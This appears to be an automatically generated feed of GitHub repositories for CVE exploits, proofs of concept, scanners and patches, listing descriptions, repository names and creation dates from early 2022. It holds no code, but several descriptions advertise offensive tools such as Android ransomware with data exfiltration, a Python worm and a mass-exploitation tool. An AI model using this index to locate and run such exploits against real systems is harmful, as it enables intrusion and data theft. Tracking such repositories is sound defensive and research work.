Zero-day-scanning is a Domain Controller vulnerability scanner, that currently includes checks for Zero-day-scanning (CVE-2020-1472), MS-PAR/MS-RPRN and SMBv2 Signing. : Anonymous-Family/Zero-day-scanning create time: 2022-03-03T01:55:28Z
Exploiting Linux Kernel Vulnerability: Dirty Cow (CVE-2016-5195) : ellietoulabi/Dirty-Cow create time: 2022-03-02T19:06:36Z
CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration : twseptian/CVE-2018-11235-Git-Submodule-CE-and-Docker-Ngrok-Configuration create time: 2022-03-02T16:26:52Z
A "Creation of Temporary Files in Directory with Insecure Permissions" vulnerability in PrintixService.exe, in Printix's "Printix Secure Cloud Print Management", Version 1.3.1106.0 and below allows any logged in user to elevate any executable or file to the SYSTEM context. This is achieved by exploiting race conditions in the Installer. : ComparedArray/printix-CVE-2022-25090 create time: 2022-03-02T13:14:11Z
no description : takumak/cve-2019-5736-reproducer create time: 2022-03-02T14:57:08Z
polkit-pkexec local privilege escalation vulnerability : Xuanyaz/CVE-2021-4034 create time: 2022-03-02T13:07:00Z
no description : lucksec/Spring-Cloud-Gateway-CVE-2022-22947 create time: 2022-03-02T11:58:55Z
Tools for get offsets and adding patch for support i386 : usernameid0/tools-for-CVE-2018-1000001 create time: 2022-03-01T21:27:37Z
no description : PaloAltoNetworks/can-ctr-escape-cve-2022-0492 create time: 2022-02-28T01:25:26Z
CVE-2022-23361 : ViNi0608/CVE-2022-23361 create time: 2022-03-01T17:08:19Z
no description : usernameid0/CVE-2018-1000857-i386 create time: 2022-03-01T17:13:01Z
no description : Mr-xn/CVE-2022-25064 create time: 2022-03-01T15:10:20Z
cve-2018-6574 : twseptian/cve-2018-6574 create time: 2022-03-01T13:42:50Z
iOS 15.1 kernel exploit POC for CVE-2021-30955 : b1n4r1b01/desc_race create time: 2022-03-01T12:41:03Z
https://gist.github.com/jakeajames/37f72c58c775bfbdda3aa9575149a8aa compiled into a ipa : verygenericname/CVE-2021-30955-POC-IPA create time: 2022-02-28T23:28:39Z
Proof of concept (wrapped into an iOS app) for CVE-2021-30955 : nickorlow/CVE-2021-30955-POC create time: 2022-02-28T22:23:51Z
This script is intended to validate Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock. : readloud/CVE-2017-5638 create time: 2022-02-28T14:49:52Z
no description : timb-machine-mirrors/CVE-2021-30955 create time: 2022-02-28T14:54:10Z
A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file. : p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML create time: 2022-02-21T19:59:11Z
Zabbix - SAML SSO Authentication Bypass : kh4sh3i/CVE-2022-23131 create time: 2022-02-28T10:37:02Z
POC for KeePass [CVE-2022-0725] : ByteHackr/keepass_poc create time: 2022-02-28T06:53:37Z
CVE-2022-0529 & CVE-2022-0530 : ByteHackr/unzip_poc create time: 2022-02-28T05:44:52Z
CVE-2022-0529 & CVE-2022-0530 : nanaao/unzip_poc create time: 2022-02-28T05:20:03Z
no description : movvamrocks/PwnKit-CVE-2021-4034 create time: 2022-02-28T04:41:40Z
Android Ransomware Development - AES256 encryption + CVE-2019-2215 + Data Exfiltration : nicchongwb/Rootsmart-v2.0 create time: 2022-02-28T02:34:31Z
no description : l00neyhacker/CVE-2022-26158 create time: 2022-02-28T03:51:56Z
no description : l00neyhacker/CVE-2022-26157 create time: 2022-02-28T03:51:05Z
no description : l00neyhacker/CVE-2022-26156 create time: 2022-02-28T03:50:12Z
no description : l00neyhacker/CVE-2022-26155 create time: 2022-02-28T03:47:15Z
CVE-2022-1111 : KiritoLoveAsuna/CVE-2022-1111 create time: 2022-02-28T01:08:03Z
kctf exploit : shahparkhan/cve-2022-0185 create time: 2022-02-27T13:42:02Z
no description : Fa1c0n35/zabbix-cve-2022-23131 create time: 2022-02-27T11:30:53Z
PoC for CVE-2022-21971 "Windows Runtime Remote Code Execution Vulnerability" : 0vercl0k/CVE-2022-21971 create time: 2022-02-26T20:37:42Z
PoC for CVE-2022-21974 "Roaming Security Rights Management Services Remote Code Execution Vulnerability" : 0vercl0k/CVE-2022-21974 create time: 2022-02-26T18:53:56Z
Exploit PoC for CVE-2020-18326 : hamm0nz/CVE-2020-18326 create time: 2022-02-26T17:30:41Z
no description : hamm0nz/CVE-2020-18325 create time: 2022-02-26T17:06:09Z
Tor Browser 9.0.7 on Windows 10 build 10586 is vulnerable to information disclosure. This could allow local attackers to bypass the intended anonymity feature and obtain information regarding the onion services visited by a local user. This can be accomplished by analyzing RAM memory even several hours after the local user used the product. This occurs because the product doesn't properly free memory. : malakkf/CVE-2021-46702 create time: 2022-02-26T13:52:44Z
CVE-2022-24086 RCE : shakeman8/CVE-2022-24086-RCE create time: 2022-02-26T10:12:45Z
no description : innxrmxst/CVE-2021-3560 create time: 2022-02-25T20:30:31Z
Apache APISIX batch-requests RCE(CVE-2022-24112) : Axx8/CVE-2022-24112 create time: 2022-02-25T15:17:28Z
Script to demonstrate the Grafana directory traversal exploit (CVE-2021-43798). : Jroo1053/GrafanaDirInclusion create time: 2022-02-25T09:26:40Z
no description : MoritzHuppert/CVE-2022-25022 create time: 2022-02-25T08:26:12Z
no description : MoritzHuppert/CVE-2022-25020 create time: 2022-02-25T08:24:44Z
no description : MoritzHuppert/CVE-2022-25018 create time: 2022-02-25T08:23:49Z
POC for CVE-2022-24124 : ColdFusionX/CVE-2022-24124 create time: 2022-02-25T07:55:55Z
no description : hahaleyile/CVE-2021-4034 create time: 2022-02-25T01:30:09Z
Python Scanner for TestRail servers vulnerable to CVE-2021-40875 : Lul/TestRail-files.md5-IAC-scanner create time: 2022-02-24T19:52:01Z
no description : bkojusner/CVE-2021-25461 create time: 2022-02-24T17:28:58Z
Exploit PoC of CVE-2020-18324 : hamm0nz/CVE-2020-18324 create time: 2022-02-24T15:38:11Z
A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 : Ananya-0306/Log-4j-scanner create time: 2022-02-24T13:49:14Z
Exploit for CVE-2022-22845 - Unauthenticated Admin Takeover On QXIP SIPCAPTURE Homer-App up to 1.4.27 : OmriBaso/CVE-2022-22845-Exploit create time: 2022-02-24T13:40:12Z
no description : pykiller/CVE-2022-23131 create time: 2022-02-24T11:34:27Z
Automated PoC of CVE-2021-44521 : QHpix/CVE-2021-44521 create time: 2022-02-24T11:07:34Z
no description : trganda/CVE-2022-23131 create time: 2022-02-24T08:10:46Z
Zabbix SSO Bypass : random-robbie/cve-2022-23131-exp create time: 2022-02-23T16:34:03Z
no description : polling-repo-continua/CVE-2022-25257 create time: 2022-02-20T06:42:24Z
CVE-2022-0529 & CVE-2022-0530 : ByteHackr/unzip_poc create time: 2022-02-23T14:15:53Z
no description : pazhanivel07/frameworks_av-10-r33_CVE-2020-0242 create time: 2022-02-23T11:48:10Z
no description : pazhanivel07/frameworks_base_CVE-2020-0209 create time: 2022-02-23T10:44:33Z
no description : Blackyguy/-CVE-2012-2661-ActiveRecord-SQL-injection- create time: 2022-02-23T10:15:59Z
no description : pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219 create time: 2022-02-23T10:10:23Z
Writeup(malay) ''Coming soon" : Blackyguy/CVE-2012-2661-ActiveRecord-SQL-injection create time: 2022-02-23T09:15:42Z
An exploit for CVE-2020-6418 implementing a SHELF Loader. Published as part of Tmp.0ut volume 2 : ulexec/ChromeSHELFLoader create time: 2022-02-19T20:00:04Z
Apache APISIX apisix/batch-requests RCE : Udyz/CVE-2022-24112 create time: 2022-02-22T19:04:52Z
CVE-2022 : TheRealSlurpie/CVE-2022 create time: 2022-02-22T16:04:27Z
CVE-2022-24112:Apache APISIX apisix/batch-requests RCE : Mr-xn/CVE-2022-24112 create time: 2022-02-22T14:09:49Z
no description : UzJu/CVE-2022-21660 create time: 2022-02-22T09:50:09Z
no description : mxypoo/CVE-2016-3116-DropbearSSH create time: 2022-02-22T06:59:55Z
no description : mtthwstffrd/dirkjanm-CVE-2020-1472 create time: 2022-02-22T03:33:38Z
no description : mtthwstffrd/SecuraBV-CVE-2020-1472 create time: 2022-02-22T03:33:24Z
no description : mtthwstffrd/calebstewart-CVE-2021-1675 create time: 2022-02-22T03:32:34Z
no description : mtthwstffrd/cube0x0-CVE-2021-1675 create time: 2022-02-22T03:32:14Z
cve-2022-23131 : L0ading-x/cve-2022-23131 create time: 2022-02-22T01:39:52Z
CVE-2021-3560 Polkit v0.105-26 Linux Privilege Escalation PoC by Vivald0x6f : Nosferatuvjr/Vivald0x6f create time: 2022-02-21T21:39:29Z
Changelog CVE-2021-33044,CVE-2021-33045 Identity authentication bypass vulnerability found in some Dahua products CVE-2021-27248,CVE-2021-27249,CVE-2021-27250,CVE-2021-34860,CVE-2021-34861,CVE-2021-34862,CVE-2021-34863 Multiple vulnerabilities in DAP-2020 H/W rev. Ax with F/W v1.01 and below HTTP Path Traversal CVE-2019-7406 RCE vulnerability in TP-Link Wi-Fi Extenders via a malformed user agent field in HTTP headers CVE-2020-2501,CVE-2021-28797 Stack Buffer Overflow in QNAP Surveillance Station CVE-2021-34730 Critical UPnP Service Flaw on Cisco Small Business RV Series Routers CVE-2020-35785 Multiple HTTP authentication vulnerabilities on DGN2200v1 : Alonzozzz/alonzzzo create time: 2022-02-21T21:22:43Z
A repository housing the exploit code for CVE-2021-27965, a stack-buffer overflow vulnerability in MsIo.sys. : Leo-Security/CVE-2021-27965-Win10-20H2-x64 create time: 2022-02-21T20:31:17Z
no description : Tanmay-N/CVE-2021-4034 create time: 2022-02-21T16:54:38Z
CVE-2022-21907 Mass Exploitation tool written in Python 3 compatible with lists of URL/IPs. For a large number of targets you can increase the number of threads, we don't recommend more than 1024. This tool is NOT free to prevent abuse and do not expect to find a fix-it-all proof of concept for exploitation for free. Only for those knowledgeable. : coconut20/CVE-2022-21907 create time: 2022-02-21T16:28:39Z
An easy to use Python package to exploit ICSA-17-124-01 / CVE-2017-7921 in HikVision camera's. : NFIRBV/krijg-de-hik create time: 2022-02-21T13:38:55Z
This is the repository used for CVE-2017-7651 for exploiting mosquitto 1.4.14 : St3v3nsS/CVE-2017-7651 create time: 2022-02-21T12:54:41Z
CVE-2022-24112 check : shakeman8/CVE-2022-24112 create time: 2022-02-21T11:52:28Z
exiftool exploit : tuhin81/CVE-2021-22204-exiftool create time: 2022-02-21T11:07:19Z
no description : AS4mir/CVE-2021-45008 create time: 2022-02-21T09:00:38Z
poc : zwjjustdoit/cve-2022-23131 create time: 2022-02-21T02:42:23Z
no description : 0tt7/CVE-2022-23131 create time: 2022-02-21T00:51:14Z
CVE-2022-25375 - Demo exploit of RNDIS USB Gadget : szymonh/rndis-co create time: 2022-02-17T14:02:58Z
Proof Of Concept for the 2021's pkexec vulnerability CVE-2021-4034 : JoaoFukuda/CVE-2021-4034_POC create time: 2022-02-20T17:49:21Z
no description : BL0odz/CVE-2021-40449-NtGdiResetDC-UAF create time: 2022-02-20T16:23:26Z
CVE-2022-24086 about Magento RCE : Mr-xn/CVE-2022-24086 create time: 2022-02-20T13:52:31Z
no description : foxtrot/CVE-2021-1965 create time: 2022-02-20T00:52:01Z
Fancy Zerologon Beta : Exploitspacks/CVE-2020-1472 create time: 2022-02-19T23:51:30Z
PrintNightmare+Manual : Exploitspacks/CVE-2021-34527-CVE-2021-1675 create time: 2022-02-19T23:20:58Z
Fully modified exploit for Ms17-010 : Exploitspacks/MS17-010-2017-2997-CVE-2017-2998-CVE-2017-2999-CVE-2017-3000-CVE-2017-3001-CVE-2017-3002-CVE-2017-3 create time: 2022-02-19T22:45:52Z
Modified exploit : Exploitspacks/CVE-2019-0708 create time: 2022-02-19T22:39:05Z
A full-fledged exploit for CVE-2018-13379-CVE-2020-12812-CVE-2019-5591 and not only with a powershell parser. Any evidence : Exploitspacks/CVE-2018-13379-CVE-2020-12812-CVE-2019-5591 create time: 2022-02-19T22:30:47Z
Vulnerability: CVE-2020-0787 (Published: March 10, 2020) Supported versions: Vista/2008/W7/2008R2/W8/2012/W8.1/2012R2/W10/2016/2019 Supported architecture: x86/x64 Development stage: v1.0.20130 (stable) Code size: 36Kb : Exploitspacks/CVE-2020-0787 create time: 2022-02-19T22:18:00Z
SonicWall Exploit CVE-2021-20028 : Exploitspacks/CVE-2021-20028 create time: 2022-02-19T21:43:51Z
no description : dhammon/HotelDruid-CVE-2021-42949 create time: 2022-02-19T21:02:42Z
no description : dhammon/HotelDruid-CVE-2021-42948 create time: 2022-02-19T21:01:12Z
Cross-Site Request Forgery : AS4mir/CVE-2021-45007 create time: 2022-02-19T15:28:59Z
CVE-2021-1965 WiFi Zero Click RCE Trigger PoC : parsdefense/CVE-2021-1965 create time: 2022-02-18T14:19:58Z
no description : 1mxml/CVE-2022-23131 create time: 2022-02-18T14:48:53Z
no description : parsdefense/CVE-2021-1965 create time: 2022-02-18T11:54:48Z
cve-2022-23131 zabbix-saml-bypass-exp : Mr-xn/cve-2022-23131 create time: 2022-02-18T11:51:47Z
CVE-2021-4034 POC and Docker and simple Analysis write up : chenaotian/CVE-2022-0185 create time: 2022-02-18T09:27:34Z
cve-2022-23131 exp : jweny/zabbix-saml-bypass-exp create time: 2022-02-18T08:38:53Z
pkexec EoP exploit : LJP-TW/CVE-2021-4034 create time: 2022-02-17T13:17:07Z
no description : LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995 create time: 2022-02-18T03:17:31Z
no description : qq1549176285/CVE-2022-23131 create time: 2022-02-18T03:03:26Z
no description : LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479 create time: 2022-02-18T02:33:04Z
Skeleton (but pronounced like Peloton): A Zero-Click RCE exploit for CVE-2021-0326 : aemmitt-ns/skeleton create time: 2022-01-17T21:35:19Z
Hotel Druid 3.0.3 Code Injection to Remote Code Execution : 0z09e/CVE-2022-22909 create time: 2022-02-17T17:18:02Z
no description : RobertDra/CVE-2022-25257 create time: 2022-02-17T13:29:26Z
no description : RobertDra/CVE-2022-25256 create time: 2022-02-17T13:11:08Z
An exploit script of CVE-2016-5195 : th3-5had0w/DirtyCOW-PoC create time: 2022-02-17T11:57:08Z
no description : tranmanhdat/couchdb_cve-2017-12635 create time: 2022-02-17T09:25:26Z
no description : RobertDra/CVE-2022-25256 create time: 2022-02-17T10:14:05Z
CVE-2022-25258 - Demo exploit targeting usb gadget's os descriptor handler : szymonh/d-os-descriptor create time: 2022-02-15T09:04:25Z
POC en Python para el CVE-2012-2982 mejorado del original por el usuario @OstojaOfficial : blu3ming/CVE-2012-2982 create time: 2022-02-16T20:00:36Z
cve-2022-24086 patch for Magento 1.9 : wambo-co/magento-1.9-cve-2022-24086 create time: 2022-02-16T08:50:33Z
CVE-2018-15473 : Goldenmonkeyy/SSHusernameEnum create time: 2022-02-16T05:27:00Z
Rust implementation of the Log 4 Shell (log 4 j - CVE-2021-44228) : s-retlaw/l4srs create time: 2022-02-16T01:13:08Z
Local and Remote scan for shellshock vulnerability for Bash versions lower than 4.3. [CVE-2014-6271].* : 0bfxgh0st-secondary/ShellShock create time: 2022-02-15T16:48:14Z
no description : r1l4-i3pur1l4/CVE-2021-1732 create time: 2022-02-15T16:55:31Z
CVE-2021-22005 vcenter任意文件上传批量验证poc : chaosec2021/CVE-2021-22005poc create time: 2022-02-15T13:11:04Z
NoPacScan is a CVE-2021-42287/CVE-2021-42278 Scanner,it scan for more domain controllers than other script : knightswd/NoPacScan create time: 2022-01-07T11:59:55Z
测试测试 : MrShiF/CVE-2022-23888 create time: 2022-02-15T09:31:13Z
SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536. : antx-code/CVE-2022-22536 create time: 2022-02-15T09:22:19Z
ceshiceshi : MrShiF/CVE-2022-1 create time: 2022-02-15T07:01:52Z
测试测试 : MrShiF/CVE-2022-1-15 create time: 2022-02-15T06:32:33Z
CVE-2021-4034 centos8可用版本 : ck00004/CVE-2021-4034 create time: 2022-02-15T02:34:48Z
Build the struts-2.3.31 (CVE-2017-5638) environment : testpilot031/vulnerability_struts-2.3.31 create time: 2022-02-15T00:38:47Z
SQL Injection Vulnerability on PhpIPAM v1.4.4 : dnr6419/CVE-2022-23046 create time: 2022-02-15T00:00:22Z
All stages of exploring the polkit CVE-2021-4034 using codeql : hohn/codeql-sample-polkit create time: 2022-02-14T22:09:44Z
no description : r1l4-i3pur1l4/CVE-2022-21882 create time: 2022-02-14T21:28:15Z
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. adminer.php) are affected. This is fixed in version 4.7.9. : llhala/CVE-2021-21311 create time: 2022-02-14T18:54:53Z
Proof of Concept for EFSRPC Arbitrary File Upload (CVE-2021-43893) : jbaines-r7/blankspace create time: 2022-02-04T17:11:00Z
Stored XSS Vulnerability on RosarioSIS 8.2.1 : dnr6419/CVE-2021-45416 create time: 2022-02-14T07:31:01Z
no description : rohankumardubey/CVE-2022-20699 create time: 2022-02-14T06:23:06Z
CVE-2021-3156 deep dive. : ret2basic/sudoscience create time: 2022-02-14T04:24:03Z
no description : soffensive/CVE-2018-6574 create time: 2022-02-13T18:05:33Z
A tool to automate the exploit PWNKIT (CVE-2021-4034) : x04000/AutoPwnkit create time: 2022-02-13T14:51:47Z
A simple PWNKIT file to convert you to root : x04000/CVE-2022-4034 create time: 2022-02-13T11:37:43Z
f4T1H's PoC script for CVE-2021-3560 Polkit D-Bus Privilege Escalation : f4T1H21/CVE-2021-3560-Polkit-DBus create time: 2022-02-13T10:12:51Z
pwncat module that automatically exploits CVE-2021-4034 (pwnkit) : DanaEpp/pwncat_pwnkit create time: 2022-02-13T00:05:32Z
no description : purple-WL/Jenkins_CVE-2019-1003000 create time: 2022-02-12T11:26:07Z
Log4j vulnerability testing environment that based on CVE-2021-44228. This environment provide guidance to build the sample infrastructure and the exploit scripts : hotpotcookie/lol4j-white-box create time: 2022-02-12T11:19:41Z
no description : purple-WL/wordpress-CVE-2022-21661 create time: 2022-02-12T11:31:26Z
CVE-2014-1767在win7_x64平台的EXP和分析文章 : ExploitCN/CVE-2014-1767-EXP-PAPER create time: 2022-02-12T08:57:19Z
no description : an0n7os/CVE-2021-4034 create time: 2022-02-12T06:20:49Z
This repository is for Log4j 2021 (CVE-2021-44228) Vulnerability demonstration and mitigation. : FeryaelJustice/Log4Shell create time: 2022-02-12T03:02:24Z
POC - CVE-2020-9484 : ColdFusionX/CVE-2020-9484 create time: 2022-02-11T15:45:10Z
This is a repo about some hacking scripts to make your hacks better and easier.Please do not use these for illegal purposes, It also includes a C (CVE-2021-4034) : mutur4/Hacking-Scripts create time: 2021-12-29T15:00:00Z
no description : yuxiaokui/CVE-2022-xxxx create time: 2022-02-11T08:12:40Z
no description : gabe-k/CVE-2021-1883 create time: 2022-02-11T04:13:25Z
pwnkit exploit : cspshivam/cve-2021-4043 create time: 2022-02-11T04:06:21Z
CVE-2021-38647 AKA "OMIGOD" vulnerability in Windows OMI : corelight/CVE-2021-38647 create time: 2021-09-15T04:51:02Z
Exploit for command injection vulnerability found in uhttpd binary from TP-Link Tapo c200 IP camera : hacefresko/CVE-2021-4045-PoC create time: 2021-11-15T14:48:14Z
Proof of Concept for CVE-2021-1585: Cisco ASA Device Manager RCE : jbaines-r7/staystaystay create time: 2022-02-10T21:52:24Z
A Incorrect Use of a Privileged APIs vulnerability in PrintixService.exe, in Printix's "Printix Secure Cloud Print Management", Version 1.3.1035.0 and below allows Privilege Escalation to change values unrestricted in the Windows Registry via the UITasks.PersistentRegistryData parameter. : ComparedArray/printix-CVE-2022-Release-Carl create time: 2022-02-10T19:12:43Z
phpMyAdmin XSS : dipakpanchal456/CVE-2022-23808 create time: 2022-02-01T17:02:03Z
no description : puckiestyle/CVE-2022-20699 create time: 2022-02-10T14:40:25Z
CVE-2022-24348 Test : mochizuki875/helm-sample create time: 2022-02-10T09:55:41Z
docker lab setup for kibana-7609 : wolf1892/CVE-2019-7609 create time: 2022-02-10T06:22:54Z
PoC script that shows RCE vulnerability over Intellian Satellite controller : Xh4H/Satellian-CVE-2020-7980 create time: 2020-01-28T23:27:20Z
no description : lukejenkins/CVE-2022-24693 create time: 2022-02-09T18:28:00Z
CVE-2020-5842 Stored XSS Vulnerability in Codoforum 4.8.3 : prasanthc41m/codoforum create time: 2022-02-09T11:20:16Z
A local PoC exploit for CVE-2019-2205 : aemmitt-ns/pacpoc create time: 2022-02-09T02:08:50Z
no description : modubyk/CVE_2020_0601 create time: 2022-02-09T02:23:41Z
Exploit for CVE-2022–22718 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE) : ly4k/SpoolFool create time: 2022-02-08T17:25:44Z
no description : TheGetch/CVE-2022-23378 create time: 2022-01-14T23:54:36Z
CVE-2012-1876 win7_x86和x64平台分析,EXP、POC代码和分析文档 : ExploitCN/CVE-2012-1876-win7_x86_and_win7x64 create time: 2022-02-08T13:03:18Z
local privilage esscalation vulnerablity : fireclasher/pwnkit-CVE-2021-4034- create time: 2022-02-08T03:55:23Z
A golang based exp for CVE-2021-4034 dubbed pwnkit (more features added......) : FDlucifer/Pwnkit-go create time: 2022-02-08T02:57:12Z
Ansible role to patch RHSB-2022-001 Polkit Privilege Escalation - (CVE-2021-4034) : ziadsaleemi/polkit_CVE-2021-4034 create time: 2022-02-08T00:09:31Z
a demonstration PoC for CVE-2022-21877 (storage spaces controller memory leak) : Big5-sec/cve-2022-21877 create time: 2022-02-07T23:18:17Z
Cisco Anyconnect VPN unauth RCE (rwx stack) : Audiobahn/CVE-2022-20699 create time: 2022-02-07T15:53:21Z
Worm written in python, abuses CVE-2020-7247 : presentdaypresenttime/shai_hulud create time: 2022-02-07T10:59:36Z
PoC for CVE-2021-4034. : pyhrr0/pwnkit create time: 2022-02-07T12:48:35Z
no description : 0x1ns4n3/CVE-2015-1328-Golden_Eye- create time: 2022-02-07T10:52:51Z
Wordpress Plugin Simple Job Board 2.9.3 LFI Vulnerability (CVE-2020-35749) proof of concept exploit : M4xSec/Wordpress-CVE-2020-35749 create time: 2022-02-06T14:52:22Z
no description : nxiwmd/cve-2022-yuio create time: 2022-02-07T08:33:45Z
no description : nxiwmd/CVE-2022-test333333 create time: 2022-02-07T08:20:50Z
no description : nxiwmd/CVE-2022-rtest2 create time: 2022-02-07T07:11:36Z
lpe poc for cve-2022-21882 : sailay1996/cve-2022-21882-poc create time: 2022-02-07T03:45:36Z
Polkit CVE-2021-4034 exploitation in High-Level Programming Language : Joffr3y/Polkit-CVE-2021-4034-HLP create time: 2022-02-06T19:42:59Z
no description : bughunt123/CVE-2020-5776 create time: 2022-02-06T16:03:02Z
Find similar issues like CVE-2022-24348 : jkroepke/CVE-2022-24348-2 create time: 2022-02-06T13:39:57Z
no description : R0rt1z2/CVE-2017-0505-mtk create time: 2022-02-04T22:43:21Z
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec in Python : ravindubw/CVE-2021-4034 create time: 2022-02-04T18:31:15Z
Script to get files from the server in a vulnerable Webmin Service. Simple and easy to use. : xen00rw/CVE-2006-3392 create time: 2021-02-09T19:13:59Z
no description : Sergio235705/audit-xss-cve-2020-7934 create time: 2022-02-04T11:56:52Z
DawnKit is Privilege Escalation USB-Rubber-Ducky payload, which exploits CVE-2021-4034 in less than 10sec's and spawns root shell for you. : drapl0n/dawnKit create time: 2022-02-04T06:33:24Z
no description : 9lyph/CVE-2021-45901 create time: 2021-09-01T05:35:59Z
a python script that downloads neofetch and traitor and attempts to exploit CVE-2021-4034 : Ph4nt0mh4x0r/auto-CVE-2021-4034 create time: 2022-02-03T19:03:01Z
Polkit vulnerability poc and automated mitigation : tahaafarooq/CVE-2021-4034 create time: 2022-02-03T18:22:54Z
exploit for CVE-2021-43848 : neex/hui2ochko create time: 2022-02-03T16:31:13Z
Apache HTTP Server 2.4.50 - RCE Lab : jas9reet/CVE-2021-42013-LAB create time: 2022-02-03T13:26:05Z
no description : L4ys/CVE-2022-21882 create time: 2022-02-03T11:25:14Z
no description : jessica0f0116/cve_2022_21882 create time: 2022-02-03T07:17:28Z
no description : Kayky-cmd/CVE-2019-6447--. create time: 2022-02-03T05:50:03Z
PwnKit-Hunter is here to help you check if your systems are vulnerable to CVE-2021-4043, a.k.a. PwnKit : cyberark/PwnKit-Hunter create time: 2022-01-30T13:42:16Z
Polkit Instant Root Exploit : n3onhacks/CVE-2021-3560 create time: 2022-02-02T17:08:24Z
CVE-2021-2175 : emad-almousa/CVE-2021-2175 create time: 2022-02-02T16:53:35Z
Test Sample : rezasarvani/CVE-2022-1234567 create time: 2022-02-02T15:13:00Z
no description : Ankit-Ojha16/CVE-2021-4034 create time: 2022-02-02T09:26:24Z
PWNKIT - Local Privilege Escalation Vulnerability on Linux (Polkit) : HrishitJoshi/CVE-2021-4034 create time: 2022-02-02T05:31:42Z
Modified Moodle exploit for privilege escalation (Dorvack) : f0ns1/CVE-2020-14321-modified-exploit create time: 2022-02-01T18:29:11Z
CVE-2022-21882 : David-Honisch/CVE-2022-21882 create time: 2022-02-01T17:58:29Z
Stored Cross-Site Scripting - D-Link : g-rubert/CVE-2021-46108 create time: 2022-02-01T15:21:15Z
no description : qkrtjsrbs315/CVE-2013-1763 create time: 2022-02-01T13:38:51Z
Pwnkit CVE-2021-4034 : scent2d/PoC-CVE-2021-4034 create time: 2022-02-01T12:11:19Z
Study on Linux kernel code injection via CVE-2014-3153 (Towelroot) : c4mx/Linux-kernel-code-injection_CVE-2014-3153 create time: 2022-02-01T09:54:52Z
PoC for CVE-2021-45897 : manuelz120/CVE-2021-45897 create time: 2022-01-31T18:48:40Z
POC Files for CVE-2019-17497 : JM-Lemmi/cve-2019-17497 create time: 2022-01-31T12:03:13Z
PortSwigger Burp Plugin for the Log4j (CVE-2021-44228) : y-security/yLog4j create time: 2022-01-31T09:54:19Z
CVE-2021-3560 analysis : chenaotian/CVE-2021-3560 create time: 2022-01-31T09:02:23Z
CVE-2021-4034 : xuntitled/Polkit-pkexec-exploit-for-Linux create time: 2022-01-31T08:44:12Z
no description : os909/iVANTI-CVE-2021-38560 create time: 2022-01-31T08:21:05Z
no description : kangpaidjo/CVE-2021-4034 create time: 2022-01-31T04:53:48Z
no description : CyberSecurityUP/CVE-2019-5420-POC create time: 2022-01-30T19:42:52Z
Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034) : OXDBXKXO/go-PwnKit create time: 2022-01-29T20:24:43Z
pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034) : Almorabea/pkexec-exploit create time: 2022-01-30T10:34:28Z
no description : milot/dissecting-pkexec-cve-2021-4034 create time: 2022-01-29T21:20:14Z
Exploit for CVE-2021-3156 : litt1eb0yy/CVE-2021-3156 create time: 2022-01-30T06:58:09Z
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. : glowbase/CVE-2020-35476 create time: 2022-01-30T05:09:07Z
PrintNightmare Local Privilege Escalation : AndrewTrube/CVE-2021-1675 create time: 2022-01-30T04:47:44Z
PwnKit PoC for Polkit pkexec CVE-2021-4034 : navisec/CVE-2021-4034-PwnKit create time: 2022-01-30T03:08:51Z
A complete PoC for CVE-2021-22204 exiftool RCE : 0xBruno/CVE-2021-22204 create time: 2022-01-30T03:11:56Z
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) : OxWeb4/CVE-2021-4034- create time: 2022-01-29T22:28:52Z
PwnKit - Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) : TW-D/PwnKit-Vulnerability_CVE-2021-4034 create time: 2022-01-29T19:59:24Z
Exploit for the PwnKit Vulnerability : v-rzh/CVE-2021-4034 create time: 2022-01-29T15:07:50Z
no description : jdordonezn/CVE-2022-24032 create time: 2022-01-29T14:25:03Z
Log4j 1.2 project, stripped of the additional appenders and CVEs that cause problems (CVE-2019-17571, CVE-2020-9488, CVE-2021-4104, CVE-2022-23302, CVE-2022-23305 and CVE-2022-23307) : Schnitker/log4j-min create time: 2022-01-29T14:03:35Z
Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a writeToParcel/createFromParcel serialization mismatch in OutputConfiguration : michalbednarski/ReparcelBug2 create time: 2022-01-29T10:14:32Z
Check CVE-2021-4034 vulnerability : codiobert/pwnkit-scanner create time: 2022-01-29T09:03:34Z
no description : nxiwmd/CVE-2022-test create time: 2022-01-29T08:41:05Z
centos 6.10的rpm包,修复CVE-2021-4034 漏洞 : sofire/polkit-0.96-CVE-2021-4034 create time: 2022-01-29T06:54:49Z
CVE-2013-3660的x64 win7平台EXP源代码,成功率100%。 : ExploitCN/CVE-2013-3660-x64-WIN7 create time: 2022-01-29T02:14:26Z
no description : CyberSecurityUP/CVE-2018-0114-Exploit create time: 2022-01-29T02:04:44Z
Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka "Windows COM Elevation of Privilege Vulnerability". This CVE ID is unique from CVE-2017-0214. : Anonymous-Family/CVE-2017-0213 create time: 2022-01-29T00:36:46Z
Local privilege escalation vulnerability for polkit's pkexec utility : glowbase/CVE-2021-4034 create time: 2022-01-28T23:36:36Z
no description : NaturalT314/CVE-2018-16763 create time: 2022-01-28T21:30:27Z
BASH file, no download capabilties? Copy and paste it! : n3onhacks/CVE-2021-4034 create time: 2022-01-28T18:12:54Z
no description : qq224015/CVE-2021-4034 create time: 2022-01-28T16:50:45Z
